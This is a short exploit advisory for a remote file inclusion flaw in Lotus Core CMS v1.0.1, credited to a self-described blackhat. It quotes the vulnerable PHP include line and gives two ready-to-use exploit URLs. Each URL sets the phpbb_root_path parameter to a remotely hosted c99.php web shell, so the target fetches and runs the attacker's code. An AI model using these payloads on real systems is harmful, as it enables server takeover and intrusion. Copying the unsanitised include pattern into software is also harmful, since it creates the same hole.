Lotus Core CMS version 1.0.1 suffers from a remote file inclusion vulnerability.
f5766ad64fa9af40cecb8eeb19db245574b08b3af340807c192f06118041e4e4
###############################################################
#
# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities
#
###############################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP TANX4 : Iranian hacker & Kurdish Security TEAM
#
# CLASS : remote
#
# download cms: https://sourceforge.net/project/showfiles.php?group_id=215112
#
################################################################
#
# C0de :
#
#
# include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
#
#
###############################################################
EXPLOIT :
https://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=https://127.0.0.1/c99.php?
https://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=https://127.0.0.1/c99.php?
#####################################################################